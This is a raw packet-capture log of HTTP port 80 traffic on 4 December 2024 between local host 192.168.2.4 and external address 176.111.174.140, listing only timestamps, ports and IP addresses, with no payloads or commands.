                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.532047033 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.532402039 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.532459021 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.532473087 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.532654047 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.535150051 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.535192966 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.535202980 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.535238028 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.537915945 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.537934065 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.537965059 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.537996054 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.538958073 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.539088011 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.539136887 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.540621996 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.540704966 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.540786028 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.543360949 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.543457031 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.543468952 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.543493986 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.543678999 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.543694019 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.543732882 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.543765068 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.546057940 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.546132088 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.546178102 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.546240091 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.548464060 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.548554897 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.548576117 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.548676014 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.548731089 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.548808098 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.548845053 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.548861980 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.551624060 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.551706076 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.551801920 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.551918030 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.552594900 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.552687883 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.552736044 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.552767038 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.554286957 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.554371119 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.554441929 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.554486036 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.556756973 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.556826115 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.556833029 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.557003975 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.557012081 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.557060003 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.557105064 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.558191061 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560349941 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560425997 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560457945 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560501099 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560796022 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560842991 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560857058 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560902119 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560950994 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.560973883 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.561000109 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.562725067 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.562783003 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.562839985 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565282106 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565315962 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565330029 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565391064 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565412045 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565469027 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565483093 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565495014 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565547943 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.565550089 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.567905903 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.567967892 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.568039894 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.569132090 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.569179058 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.569251060 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.572807074 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.572854042 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.572935104 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.573497057 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.573605061 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.573666096 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.576528072 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.576606989 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.576632977 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.576674938 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.580262899 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.580333948 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.580352068 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.580395937 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.581736088 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.581887007 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.581933975 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.584009886 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.584069967 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.584165096 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.584707975 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.587698936 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.587804079 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.587883949 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.590210915 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.590372086 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.590442896 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.591356993 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.591412067 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.591474056 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.592664957 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.594974041 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.595087051 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.595119953 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.595164061 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.598587990 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.598654985 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.598664999 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.598668098 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.598702908 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.598711014 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.598723888 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.599847078 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.602504015 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.602612019 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.602663040 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.606024981 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.606093884 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.606142044 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.607100010 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.607228994 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.607279062 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.611139059 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.611267090 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.611325026 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.615206003 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.615262032 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.615317106 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.619349003 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.619375944 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.619442940 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.623229980 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.623398066 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.623442888 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.628019094 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.628134012 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.628190994 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.632288933 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.632343054 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.632405043 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.636246920 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.636320114 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.636343956 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.636390924 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.640345097 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.640436888 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.640566111 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.644017935 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.644115925 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.644159079 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.644232988 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.644321918 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.644408941 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.644440889 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.644454956 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.645750046 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.646173000 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.647516966 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.647644043 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.648267984 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.648324013 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.650877953 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.650904894 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.650962114 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.654897928 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.654932022 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.654963017 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.654990911 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.658839941 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.658910990 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.658967018 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.675996065 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.676054955 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.676141024 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.677100897 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.677165985 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.677202940 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.677248001 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.679582119 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.679662943 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.679713964 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.681747913 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.681884050 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.681941986 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.684043884 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.684112072 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.684222937 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.684380054 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.686333895 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.686395884 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.686430931 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.686479092 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.688474894 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.688504934 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.688538074 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.688549995 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.690772057 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.690875053 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.691154003 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.691219091 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.692857981 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.692908049 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.693018913 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.693067074 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.694935083 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.695087910 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.695157051 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.697134018 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.697196960 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.697438002 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.697495937 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.699359894 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.699515104 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.699570894 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.701445103 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.701492071 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.701504946 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.701539993 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.703305960 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.703516006 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.703579903 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.704262972 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.704348087 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.704396963 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.705148935 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.705200911 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.705209017 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.705759048 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.705815077 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.705816984 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.705854893 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.705897093 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.707976103 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.708050966 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.708101034 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.708214998 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.708230972 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.708267927 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.708298922 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.708858967 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.708924055 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.708975077 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.709995985 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.710016012 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.710062981 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.710104942 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.710139990 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.710150003 CET4973080192.168.2.4176.111.174.140
